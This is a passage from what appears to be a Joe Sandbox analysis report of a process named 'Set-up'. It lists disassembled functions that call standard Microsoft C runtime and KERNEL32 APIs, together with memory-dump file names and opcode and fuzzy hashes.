_malloc_crt.MSVCR100(00001000,?,?,?,?,6BB51072,?,6BB510A8,0000000C,6BB510DE,Function_000113F7,?,?,00000000,?), ref: 6BB68A71

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __p__iob_fileno_isatty_malloc_crt
String ID:
API String ID: 301265415-0
Opcode ID: a1e814d72a57560b7b07b189af146243051b30e44dd77f18d8ae63a60d3293aa
Instruction ID: 1aecc6c40d9ba3be3a1b7c73c9d84facaec62f8477860ccfa6a2bd7907fd20d5
Opcode Fuzzy Hash: a1e814d72a57560b7b07b189af146243051b30e44dd77f18d8ae63a60d3293aa
Instruction Fuzzy Hash: D91173B38187429ED3608F79DC41647B7F8EF593A8B10492ED596C3640F778E490CB91

Function 6BB4C830 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_errno.MSVCR100(6BB4C8B0,0000000C), ref: 6BB4C8D6
_invalid_parameter_noinfo.MSVCR100(6BB4C8B0,0000000C), ref: 6BB694A7

Part of subcall function 6BB4C656: _lock.MSVCR100(00000001,6BB4C6A0,00000010,6BB4C872,6BB4C8B0,0000000C), ref: 6BB4C66B

_errno.MSVCR100(6BB4C8B0,0000000C), ref: 6BB694B3
_errno.MSVCR100(6BB4C8B0,0000000C), ref: 6BB694C0
@_EH4_CallFilterFunc@8.LIBCMT(6BBE3610,?,000000FE,6BB4C8B0,0000000C), ref: 6BB694D6

Part of subcall function 6BB4C737: __wsopen_s.LIBCMT(?,?,00000000,?,00000180,00000000,?,?), ref: 6BB4C801

Part of subcall function 6BB4C8CC: _unlock_file.MSVCR100(?,6BB4C8A6), ref: 6BB4C8CF

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$CallFilterFunc@8__wsopen_s_invalid_parameter_noinfo_lock_unlock_file
String ID:
API String ID: 773299370-0
Opcode ID: 2d3600558105bf51b3f48c04f7505427b01f49379944b8dbd60f5bfd4279f3da
Instruction ID: 6d4e6ebf777230bc4b732bf6282eaadc18b6f048ee8ed8cc20c149fe970a5798
Opcode Fuzzy Hash: 2d3600558105bf51b3f48c04f7505427b01f49379944b8dbd60f5bfd4279f3da
Instruction Fuzzy Hash: C1110270840284EECB10AF788C4266E37B1BF48754B658E40D024CB28DFB7D8980ABA1

Function 6BB57385 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

_calloc_crt.MSVCR100(00000001,00000004,00000000,00000000,0000003D,?,6BB573E6,74DEDF80,00000000,00000000), ref: 6BB573A8
_wcsdup.MSVCR100(00000000,00000000,00000000,0000003D,?,6BB573E6,74DEDF80,00000000,00000000), ref: 6BB573C5

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _calloc_crt_wcsdup
String ID:
API String ID: 1800982338-0
Opcode ID: 5b08de2ed221164f32a8d5774b068affb9a3b21a8141c1f95a01a0211a412f0c
Instruction ID: d7122364688379f3fb8b028fcb891b03f71a4eeb4612558a360aebae120dfc80
Opcode Fuzzy Hash: 5b08de2ed221164f32a8d5774b068affb9a3b21a8141c1f95a01a0211a412f0c
Instruction Fuzzy Hash: 9A01DF73B002929BE7109F79DC01B5A77E8EB41B78F244269D961C7280EBB9D8518BA1

Function 6BB4BD9A Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6BB707A6
GetCurrentProcessId.KERNEL32 ref: 6BB707B2
GetCurrentThreadId.KERNEL32 ref: 6BB707BA
GetTickCount.KERNEL32 ref: 6BB707C2
QueryPerformanceCounter.KERNEL32(?), ref: 6BB707CE

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 8b56d15dcff44d496384ba65d201a1ebae5db1d2e74fdd12c178943998f6957b
Instruction ID: 3ef448eba907f4918b4958c81b354c970eff6198534d738f6256afd15a84dc49
Opcode Fuzzy Hash: 8b56d15dcff44d496384ba65d201a1ebae5db1d2e74fdd12c178943998f6957b
Instruction Fuzzy Hash: 60118276D042649FDF31EBB8C8486AEB7F8EF49355F9509A2E811E7200DB75D9018B90

Function 6BB8780F Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6BB87835
GetLastError.KERNEL32(?,00000000,00000000), ref: 6BB87842
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6BB8785A
_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000,?,00000000,00000000), ref: 6BB87868
InitializeSListHead.KERNEL32(00000028,?,?,?,?,?,?,00000000,00000000), ref: 6BB87887

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionHeadInitializeLastListThrow
String ID:
API String ID: 2464499457-0
Opcode ID: bbb64c125c1c13fec32771bd0451f861e84e438e922b0b0b554e1660d7c7c893
Instruction ID: db5d944028048585397c3310ccfc33a288f744e5031c238e050b0fcc49b57ffc
Opcode Fuzzy Hash: bbb64c125c1c13fec32771bd0451f861e84e438e922b0b0b554e1660d7c7c893
Instruction Fuzzy Hash: 0E014CB1900745AFC730AF66CCC896BFBECFA09204754493DE4AAC2600D778E548CB60

Function 6BB8C86F Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6BB676A1,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB8C4DA
free.MSVCR100(00000000,?,?,6BB676A1,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB8C4DD
DeleteCriticalSection.KERNEL32(FFFFFFFF,?,?,6BB676A1,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB8C504
DecodePointer.KERNEL32(FFFFFFFF,6BB676A1,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB8C880
TlsFree.KERNEL32(FFFFFFFF,6BB676A1,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB8C89E

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CriticalDeleteSection$DecodeFreePointerfree
String ID:
API String ID: 1464103408-0
Opcode ID: 568f3b21ff73ad32b86fbc5e7451d64a7c6dc09f054a872a0d0c047e02ecab7b
Instruction ID: e05a8d8835bdd241e9e10a8026fdc43eebcc34945780fe87296dea4fc362fd32
Opcode Fuzzy Hash: 568f3b21ff73ad32b86fbc5e7451d64a7c6dc09f054a872a0d0c047e02ecab7b
Instruction Fuzzy Hash: 1C01B5729002D1ABDA315A68DC85679B3E8DF427B5329474AE878D31B0C73EDC868B70

Function 6BB41635 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB41641
_errno.MSVCR100 ref: 6BB4165B
_errno.MSVCR100 ref: 6BB41685
_errno.MSVCR100 ref: 6BB4168F
_errno.MSVCR100 ref: 6BB6C355

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 7f0233ba04b6b693044806ee86adc115b60e614443f263a97df727de8bae0fdc
Instruction ID: df0bf8b00cca468ce62d2ae82adf2c8eec417cebfee2771ef44682979b416b52
Opcode Fuzzy Hash: 7f0233ba04b6b693044806ee86adc115b60e614443f263a97df727de8bae0fdc
Instruction Fuzzy Hash: D0019E70904395DFDB206F68C481B187BB9FF16328F5C41A9E5508A198EB7CDC80EF92

Function 6BB4E2C0 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB4E2CC
_errno.MSVCR100 ref: 6BB4E2E6
_errno.MSVCR100 ref: 6BB4E30C
_errno.MSVCR100 ref: 6BB4E316
_errno.MSVCR100 ref: 6BB6B8E6

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 2e2c6133e67dc508463d10d431fac4f051eb4a40ca8b912ec9ca342d6b22e40f
Instruction ID: cbd963717bdf68db0214468a9112c911f4ba2dccfd12328c1b7d80ae72df9e47
Opcode Fuzzy Hash: 2e2c6133e67dc508463d10d431fac4f051eb4a40ca8b912ec9ca342d6b22e40f
Instruction Fuzzy Hash: 1B015A30614784AFD72AAB68C04175C7BB4FF5A369F00069AD5604B298EB7C9D40EF62

Function 6BB40110 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

memcpy.MSVCR100(?,00000000,?), ref: 6BB40141
_errno.MSVCR100 ref: 6BB695AD
_invalid_parameter_noinfo.MSVCR100 ref: 6BB695B7
_memset.LIBCMT(?,00000000,?), ref: 6BB695CB
_errno.MSVCR100 ref: 6BB695DE

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_memsetmemcpy
String ID:
API String ID: 2314827996-0
Opcode ID: 24d3509d602729fcf9db17f7d46f62d11e562c21541381a8313e25e63287101c
Instruction ID: c7b2ba60a6c90db5adce8f56dcc0820bd0875fe6d3d5ffb4ae51d91de9cdce1b
Opcode Fuzzy Hash: 24d3509d602729fcf9db17f7d46f62d11e562c21541381a8313e25e63287101c
Instruction Fuzzy Hash: 9C014F315443A8EBCF215F24DC09BDD3B64EF09B99F004466FC185A191E7798990DF92

Function 6BB516B5 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCR100(00000000,?,?,6BB4D354,?,00000000,00000000), ref: 6BB516BF
SetFilePointer.KERNEL32(00000000,?,00000000,6BB4D354,00000000,?,?,6BB4D354,?,00000000,00000000), ref: 6BB516D8
_errno.MSVCR100(?,?,6BB4D354,?,00000000,00000000), ref: 6BB7036B
GetLastError.KERNEL32(?,6BB4D354,?,00000000,00000000), ref: 6BB7037E
__dosmaperr.LIBCMT(00000000,?,6BB4D354,?,00000000,00000000), ref: 6BB7038A

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr_errno_get_osfhandle
String ID:
API String ID: 1165083932-0
Opcode ID: 34d9abc98fcc59b0b7ff3a64257f0b8060b39fc7355ca3319e427e84a739b473
Instruction ID: 964ce60f824614538136776967e60ef2c5a291296c53c9242717c6eeb7033481
Opcode Fuzzy Hash: 34d9abc98fcc59b0b7ff3a64257f0b8060b39fc7355ca3319e427e84a739b473
Instruction Fuzzy Hash: D101F4332146A06FC6212EBC8C44A4E372CEB86775B190762F534DB1E0EB39D8118B95

Function 6BB43798 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

_errno.MSVCR100(?,6BB42D92,?,?,?,00000000,?), ref: 6BB693B8
_invalid_parameter_noinfo.MSVCR100(?,6BB42D92,?,?,?,00000000,?), ref: 6BB693C3
_errno.MSVCR100(?,?,6BB42D92,?,?,?,00000000,?), ref: 6BB693CD
_errno.MSVCR100 ref: 6BB693E4
_invalid_parameter_noinfo.MSVCR100(?,?,6BB42D92,?,?,?,00000000,?), ref: 6BB693EF

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 5848b5253e9cee47491a0fed02dbdb08324d0f6b87ce9a633d63089306b98a83
Instruction ID: f3d447a0de4efbb5eaf56c0c237d12a435cc81c7cc01adaeff872fe5f1c669d1
Opcode Fuzzy Hash: 5848b5253e9cee47491a0fed02dbdb08324d0f6b87ce9a633d63089306b98a83
Instruction Fuzzy Hash: C501F931440685EBCB102F74CC01BAE3B64BF45778F040256F878462D5EB7D8860EF92

Function 6BB4E651 Relevance: 7.5, APIs: 5, Instructions: 42COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB6927E
_invalid_parameter_noinfo.MSVCR100 ref: 6BB69289
_errno.MSVCR100 ref: 6BB69293
_errno.MSVCR100 ref: 6BB692A8
_invalid_parameter_noinfo.MSVCR100 ref: 6BB692B3

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 97d60a77f74a562a9ca5261651c46b648a33d20b97420505f6eaf78e590c241b
Instruction ID: 8590008a0d0b8a3623d2b01a9ae33e195910b5926d3b675e6a8d001c199d2b4d
Opcode Fuzzy Hash: 97d60a77f74a562a9ca5261651c46b648a33d20b97420505f6eaf78e590c241b
Instruction Fuzzy Hash: 9C018631840AD8AADB115FB4CC0179E3B54BF46768F000645E968491D5EB7D8850DFE2

Function 6BB7F2B7 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB7F2BE
EnterCriticalSection.KERNEL32(6BB7D93F,00000008,6BB89035), ref: 6BB7F2D0
??2@YAPAXI@Z.MSVCR100(00000024), ref: 6BB7F2E2

Part of subcall function 6BB402C1: malloc.MSVCR100(?), ref: 6BB402CC

??2@YAPAXI@Z.MSVCR100(00000030), ref: 6BB7F307

Part of subcall function 6BB87EE6: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6BB87F10
Part of subcall function 6BB87EE6: GetLastError.KERNEL32(?,00000000,00000000), ref: 6BB87F1D
Part of subcall function 6BB87EE6: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6BB87F35
Part of subcall function 6BB87EE6: _CxxThrowException.MSVCR100(?,6BBDFEB4,00000000,?,00000000,00000000), ref: 6BB87F43

LeaveCriticalSection.KERNEL32(?), ref: 6BB7F329

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ??2@CriticalSection$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateEnterErrorEventExceptionH_prolog3LastLeaveThrowmalloc
String ID:
API String ID: 921447554-0
Opcode ID: d541a85c19b62f8982e2538237171c277e22fb0d2ebaebc59995bce32d68adc9
Instruction ID: 463d8f86508bbe0263676017655c4f250eb61b45db38ced775fd8a428e9e2e23
Opcode Fuzzy Hash: d541a85c19b62f8982e2538237171c277e22fb0d2ebaebc59995bce32d68adc9
Instruction Fuzzy Hash: 50015A30D1AAD5EFDB21EBB8850679DBAE0BB05708F5004A6D510B7280D7BC8A00DB96

Function 6BB52F0F Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

_lock_file.MSVCR100(?,6BB52F78,0000000C,6BB52FAC,?,000000FF,?,?,?), ref: 6BB52F3E

Part of subcall function 6BB4A557: _lock.MSVCR100(?,?,?,6BB96EA0,00000040,6BB96ED8,0000000C,6BB68676,00000000,?), ref: 6BB4A584

_fread_nolock_s.MSVCR100(?,?,?,?,?,6BB52F78,0000000C,6BB52FAC,?,000000FF,?,?,?), ref: 6BB52F56

Part of subcall function 6BB52E42: memcpy_s.MSVCR100(?,?,?,?), ref: 6BB52EEB

Part of subcall function 6BB52A86: _unlock_file.MSVCR100(6BB52F6D,6BB52F6D), ref: 6BB52A89

_memset.LIBCMT(?,00000000,000000FF,6BB52F78,0000000C,6BB52FAC,?,000000FF,?,?,?), ref: 6BB68D02
_errno.MSVCR100(6BB52F78,0000000C,6BB52FAC,?,000000FF,?,?,?), ref: 6BB68D0A
_invalid_parameter_noinfo.MSVCR100(6BB52F78,0000000C,6BB52FAC,?,000000FF,?,?,?), ref: 6BB68D15

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_fread_nolock_s_invalid_parameter_noinfo_lock_lock_file_memset_unlock_filememcpy_s
String ID:
API String ID: 3226975504-0
Opcode ID: 7aa8ad854204274d7e99a8a362c28fd6756b2b4b4b856d09598dd5288c2e0c3f
Instruction ID: fd4d9cf15c8356229a76e59c9a15efd47819bfb999b5554dac310738e13d0e9b
Opcode Fuzzy Hash: 7aa8ad854204274d7e99a8a362c28fd6756b2b4b4b856d09598dd5288c2e0c3f
Instruction Fuzzy Hash: 25012C7280269AEBCF119FB4DC0259E7B30FF14754F108166F825151A4D77986B1EFD2

Function 6BB4CA4F Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_control87.MSVCR100(00000001,?,00000000,?,6BB8CE9B,00000000,00010000,00030000,?,6BB71D56,?,6BB4B983,?,?,6BB4B295,00000000), ref: 6BB4CA7D
_control87.MSVCR100(00000000,00000000,00000000,?,6BB8CE9B,00000000,00010000,00030000,?,6BB71D56,?,6BB4B983,?,?,6BB4B295,00000000), ref: 6BB724BB
_errno.MSVCR100(00000000,?,6BB8CE9B,00000000,00010000,00030000,?,6BB71D56,?,6BB4B983,?,?,6BB4B295,00000000), ref: 6BB724C4
_invalid_parameter_noinfo.MSVCR100(00000000,?,6BB8CE9B,00000000,00010000,00030000,?,6BB71D56,?,6BB4B983,?,?,6BB4B295,00000000), ref: 6BB724CE
_control87.MSVCR100(00000001,?,00000000,?,6BB8CE9B,00000000,00010000,00030000,?,6BB71D56,?,6BB4B983,?,?,6BB4B295,00000000), ref: 6BB724DA

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _control87$_errno_invalid_parameter_noinfo
String ID:
API String ID: 1498936549-0
Opcode ID: bf4e1a7da49c6d64d966f304bc058d75b43548e15341f806baddd6ebdcd0a6cc
Instruction ID: 2e1b0259608d297c50d1f5f3365ac9f9c50a5c343019cc96fb4a8ae30afde755
Opcode Fuzzy Hash: bf4e1a7da49c6d64d966f304bc058d75b43548e15341f806baddd6ebdcd0a6cc
Instruction Fuzzy Hash: 4BF096325487947BD7256E74980276D3394EF05F64F204419FE54DB284DB789440A798

Function 6BB7B795 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

_memset.LIBCMT(?,00000000,0000000C), ref: 6BB7B7A0
?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB7B7A8

Part of subcall function 6BB7B6C7: __EH_prolog3.LIBCMT ref: 6BB7B6CE

?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB7B7B2
GetCurrentProcess.KERNEL32(?,?), ref: 6BB7B7C4
GetProcessAffinityMask.KERNEL32(00000000), ref: 6BB7B7CB

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Version@$Concurrency@@Manager@1@ProcessResource$AffinityCurrentH_prolog3Mask_memset
String ID:
API String ID: 4257252171-0
Opcode ID: 67a14df92c6eb6a3142e9bbf6f90e18639f9447e482fd88278fb38627a0d1044
Instruction ID: 3794da70a8530585d65dbd7aa8664d5b2f019f6311a6e53c2c883c097aae9e0b
Opcode Fuzzy Hash: 67a14df92c6eb6a3142e9bbf6f90e18639f9447e482fd88278fb38627a0d1044
Instruction Fuzzy Hash: 4AF03A71100644BBDB31EFB4CC4AEAE7BACEF4A384B100421F629C7150E735E640CBA1

Function 6BB4A745 Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__doserrno.MSVCR100(?,6BBB84F4,?,?,?,?,?,?,6BB6FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB4A780
__doserrno.MSVCR100(?,6BBB84F4,?,?,?,?,?,?,6BB6FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB70417
_errno.MSVCR100(?,6BBB84F4,?,?,?,?,?,?,6BB6FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB7041F
